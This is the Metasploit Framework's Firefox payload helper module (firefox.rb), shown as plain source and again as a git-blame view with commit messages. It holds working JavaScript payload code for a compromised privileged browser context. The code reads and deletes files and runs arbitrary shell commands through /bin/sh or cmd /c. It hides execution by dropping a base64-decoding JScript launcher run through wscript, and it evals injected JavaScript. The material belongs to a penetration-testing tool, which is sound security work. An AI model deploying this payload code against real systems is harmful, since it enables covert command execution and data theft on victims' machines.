metasploit-framework/lib/msf/core/payload/firefox.rb

# -*- coding: binary -*-
require 'msf/core'

module Msf::Payload::Firefox

  # Javascript source code of readFile(path) - synchronously reads a file and returns
  # its contents. The file is deleted immediately afterwards.
  #
  # @return [String] javascript source code that exposes the readFile(path) method
  def read_file_source
    %Q|
      var readFile = function(path) {
        try {
          var file = Components.classes["@mozilla.org/file/local;1"]
                   .createInstance(Components.interfaces.nsILocalFile);
          file.initWithPath(path);

          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
                           .createInstance(Components.interfaces.nsIFileInputStream);
          fileStream.init(file, 1, 0, false);

          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
                             .createInstance(Components.interfaces.nsIBinaryInputStream);
          binaryStream.setInputStream(fileStream);
          var array = binaryStream.readByteArray(fileStream.available());

          binaryStream.close();
          fileStream.close();
          file.remove(true);

          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
        } catch (e) { return ""; }
      };
    |
  end

  # Javascript source code of runCmd(str,cb) - runs a shell command on the OS
  #
  # Because of a limitation of firefox, we cannot retrieve the shell output
  # so the stdout/err are instead redirected to a temp file, which is read and
  # destroyed after the command completes.
  #
  # On posix, the command is double wrapped in "/bin/sh -c" calls, the outer of
  # which redirects stdout.
  #
  # On windows, the command is wrapped in two "cmd /c" calls, the outer of which
  # redirects stdout. A JScript "launch" file is dropped and invoked with wscript
  # to run the command without displaying the cmd.exe prompt.
  #
  # When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
  # javascript code between the tags is eval'd and returned.
  #
  # @return [String] javascript source code that exposes the runCmd(str) method.
  def run_cmd_source
    %Q|
      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
      var windows = (ua.indexOf("Windows")>-1);
      var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
      var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
      var runCmd = function(cmd, cb) {
        var echo = function(str) {
          if(!str \|\| !str.length) return '';
          var e = str.match(/echo ['"]?([^;\\s"']+)/);
          return (e && e[1]) \|\| '';
        }
        var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
        if (js) {
          var wcmd = (windows) ? cmd+"\\n" : '';
          var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
          Function('cb', js[1])(function(r) {
            cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
          })
          return;
        }

        var shEsc = "\\\\$&";
        var shPath = "/bin/sh -c"

        if (windows) {
          shPath = "cmd /c";
          shEsc = "\\^$&";
          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
            .getService(Components.interfaces.nsIProperties)
            .get("TmpD", Components.interfaces.nsIFile);
          jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8+rand(12))}.js');
          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
            .createInstance(Components.interfaces.nsIFileOutputStream);
          stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
          stream.write(jscript, jscript.length);
          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
            stream.finish();
          } else {
            stream.close();
          }
        }

        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";

        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
          .getService(Components.interfaces.nsIProperties)
          .get("TmpD", Components.interfaces.nsIFile);
        stdout.append(stdoutFile);

        if (windows) {
          var shell = shPath+" "+cmd;
          shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
          var b64 = svcs.btoa(shell);
        } else {
          var shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
          shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
        }
        var process = Components.classes["@mozilla.org/process/util;1"]
          .createInstance(Components.interfaces.nsIProcess);
        var sh = Components.classes["@mozilla.org/file/local;1"]
                   .createInstance(Components.interfaces.nsILocalFile);

        if (windows) {
          sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
          process.init(sh);
          var args = [jscriptFile.path, b64];
          process.run(true, args, args.length);
          jscriptFile.remove(true);
          cb(cmd+"\\n"+readFile(stdout.path));
        } else {
          sh.initWithPath("/bin/sh");
          process.init(sh);
          var args = ["-c", shell];
          process.run(true, args, args.length);
          cb(readFile(stdout.path));
        }
      };
    |
  end

  # This file is dropped on the windows platforms to a temp file in order to prevent the
  # cmd.exe prompt from appearing. It is executed and then deleted.
  #
  # @return [String] JScript that reads its command-line argument, decodes
  # base64 and runs it as a shell command.
  def jscript_launcher
    %Q|
      var b64 = WScript.arguments(0);
      var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");
      var el  = dom.createElement("root");
      el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);
      var stream = new ActiveXObject("ADODB.Stream");
      stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);
      stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;
      var cmd = stream.ReadText();
      (new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
    |
  end
end
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`# -- coding: binary --`
			`require 'msf/core'`

			`module Msf::Payload::Firefox`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00
			`# Javascript source code of readFile(path) - synchronously reads a file and returns`
			`# its contents. The file is deleted immediately afterwards.`
			`#`
			`# @return [String] javascript source code that exposes the readFile(path) method`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`def read_file_source`
Digging around to get shell_command_token to work. 2014-01-02 20:05:06 +00:00			`%Q\|`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`var readFile = function(path) {`
			`try {`
			`var file = Components.classes["@mozilla.org/file/local;1"]`
			`.createInstance(Components.interfaces.nsILocalFile);`
			`file.initWithPath(path);`

			`var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]`
			`.createInstance(Components.interfaces.nsIFileInputStream);`
			`fileStream.init(file, 1, 0, false);`

			`var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]`
			`.createInstance(Components.interfaces.nsIBinaryInputStream);`
			`binaryStream.setInputStream(fileStream);`
			`var array = binaryStream.readByteArray(fileStream.available());`

			`binaryStream.close();`
			`fileStream.close();`
			`file.remove(true);`

Digging around to get shell_command_token to work. 2014-01-02 20:05:06 +00:00			`return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");`
			`} catch (e) { return ""; }`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`};`
			`\|`
			`end`

Refactor runCmd, allow js exec. * Updates exec payload to not touch disk * Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options) 2014-01-04 14:46:41 +00:00			`# Javascript source code of runCmd(str,cb) - runs a shell command on the OS`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`#`
			`# Because of a limitation of firefox, we cannot retrieve the shell output`
			`# so the stdout/err are instead redirected to a temp file, which is read and`
			`# destroyed after the command completes.`
			`#`
			`# On posix, the command is double wrapped in "/bin/sh -c" calls, the outer of`
			`# which redirects stdout.`
			`#`
			`# On windows, the command is wrapped in two "cmd /c" calls, the outer of which`
Refactor runCmd, allow js exec. * Updates exec payload to not touch disk * Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options) 2014-01-04 14:46:41 +00:00			`# redirects stdout. A JScript "launch" file is dropped and invoked with wscript`
			`# to run the command without displaying the cmd.exe prompt.`
			`#`
			`# When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the`
			`# javascript code between the tags is eval'd and returned.`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`#`
			`# @return [String] javascript source code that exposes the runCmd(str) method.`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`def run_cmd_source`
Digging around to get shell_command_token to work. 2014-01-02 20:05:06 +00:00			`%Q\|`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]`
			`.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;`
Refactor runCmd, allow js exec. * Updates exec payload to not touch disk * Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options) 2014-01-04 14:46:41 +00:00			`var windows = (ua.indexOf("Windows")>-1);`
Fixes shell escaping errors with nested quotes in windows. 2014-01-03 22:14:28 +00:00			`var svcs = Components.utils.import("resource://gre/modules/Services.jsm");`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;`
Refactor runCmd, allow js exec. * Updates exec payload to not touch disk * Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options) 2014-01-04 14:46:41 +00:00			`var runCmd = function(cmd, cb) {`
			`var echo = function(str) {`
			`if(!str \\|\\| !str.length) return '';`
			`var e = str.match(/echo ['"]?([^;\\s"']+)/);`
			`return (e && e[1]) \\|\\| '';`
			`}`
			`var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());`
			`if (js) {`
			`var wcmd = (windows) ? cmd+"\\n" : '';`
			`var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});`
			`Function('cb', js[1])(function(r) {`
			`cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))`
			`})`
			`return;`
			`}`

DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`var shEsc = "\\\\$&";`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`var shPath = "/bin/sh -c"`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`if (windows) {`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`shPath = "cmd /c";`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`shEsc = "\\^$&";`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]`
			`.getService(Components.interfaces.nsIProperties)`
			`.get("TmpD", Components.interfaces.nsIFile);`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8+rand(12))}.js');`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]`
			`.createInstance(Components.interfaces.nsIFileOutputStream);`
			`stream.init(jscriptFile, 0x04 \\| 0x08 \\| 0x20, 0666, 0);`
			`stream.write(jscript, jscript.length);`
			`if (stream instanceof Components.interfaces.nsISafeOutputStream) {`
			`stream.finish();`
			`} else {`
			`stream.close();`
			`}`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`}`

Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00
			`var stdout = Components.classes["@mozilla.org/file/directory_service;1"]`
			`.getService(Components.interfaces.nsIProperties)`
			`.get("TmpD", Components.interfaces.nsIFile);`
			`stdout.append(stdoutFile);`

Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`if (windows) {`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`var shell = shPath+" "+cmd;`
			`shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";`
Fixes shell escaping errors with nested quotes in windows. 2014-01-03 22:14:28 +00:00			`var b64 = svcs.btoa(shell);`
Minor cleanup of firefox.rb. 2014-01-03 07:34:57 +00:00			`} else {`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`var shell = shPath+" "+cmd.replace(/\\W/g, shEsc);`
			`shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`}`
			`var process = Components.classes["@mozilla.org/process/util;1"]`
			`.createInstance(Components.interfaces.nsIProcess);`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`var sh = Components.classes["@mozilla.org/file/local;1"]`
			`.createInstance(Components.interfaces.nsILocalFile);`

Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`if (windows) {`
			`sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");`
			`process.init(sh);`
Fixes shell escaping errors with nested quotes in windows. 2014-01-03 22:14:28 +00:00			`var args = [jscriptFile.path, b64];`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`process.run(true, args, args.length);`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`jscriptFile.remove(true);`
Refactor runCmd, allow js exec. * Updates exec payload to not touch disk * Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options) 2014-01-04 14:46:41 +00:00			`cb(cmd+"\\n"+readFile(stdout.path));`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`} else {`
Minor cleanup of firefox.rb. 2014-01-03 07:34:57 +00:00			`sh.initWithPath("/bin/sh");`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`process.init(sh);`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`var args = ["-c", shell];`
			`process.run(true, args, args.length);`
Refactor runCmd, allow js exec. * Updates exec payload to not touch disk * Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options) 2014-01-04 14:46:41 +00:00			`cb(readFile(stdout.path));`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`}`
DRYs up firefox payloads. 2014-01-02 08:20:54 +00:00			`};`
			`\|`
			`end`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`# This file is dropped on the windows platforms to a temp file in order to prevent the`
			`# cmd.exe prompt from appearing. It is executed and then deleted.`
			`#`
			`# @return [String] JScript that reads its command-line argument, decodes`
			`# base64 and runs it as a shell command.`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`def jscript_launcher`
			`%Q\|`
Fixes shell escaping errors with nested quotes in windows. 2014-01-03 22:14:28 +00:00			`var b64 = WScript.arguments(0);`
			`var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");`
			`var el = dom.createElement("root");`
			`el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);`
			`var stream = new ActiveXObject("ADODB.Stream");`
			`stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);`
			`stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;`
			`var cmd = stream.ReadText();`
			`(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);`
Rework windows shell to use wscript. 2014-01-03 07:29:34 +00:00			`\|`
			`end`
			`end`